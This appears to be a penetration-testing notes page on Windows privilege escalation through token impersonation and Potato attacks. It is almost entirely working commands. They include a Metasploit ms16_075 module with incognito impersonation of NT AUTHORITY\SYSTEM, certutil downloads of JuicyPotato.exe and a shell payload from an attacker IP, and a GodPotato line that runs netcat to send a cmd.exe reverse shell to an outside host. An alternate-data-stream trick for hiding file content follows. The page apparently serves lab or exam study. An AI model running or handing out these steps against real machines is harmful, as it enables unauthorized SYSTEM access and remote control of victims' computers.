Impersonation and Potato Attacks

Token Impersonation Overview

Potato Attack Overview

Escalation via Potato Attack

After getting a meterpreter shell

background
use exploit/windows/local/ms16_075_reflection
set LHOST tun0
set LPORT 1738        <-- Something different from the first shell
exploit

Inside of new meterpreter shell

load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
shell
whoami

Manual Juicy Potato Attack

cd C:\Windows\System32\spool\drivers\color\
certutil.exe -urlcache -f http://10.9.209.91/JuicyPotato.exe juicy.exe
certutil.exe -urlcache -f http://10.9.209.91/shell.exe
juicy.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p "C:\Windows\System32\spool\drivers\color\shell.exe"

GOD POTATO

godpotato.exe -cmd "cmd /c whoami"

.\godpotato.exe -cmd "C:\programdata\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.214 1338"

Resources

Bonus

Alternate Data Streams

Alternate datastreams are a file attribute in NTFS only. Regular data stream is primary text inside of a file. Alternate is a way to hide informtion inside of a file

dir /r
more hm.txt:root.txt:$DATA

PreviousUnquoted Service Paths NextRegisty

Last updated 6 months ago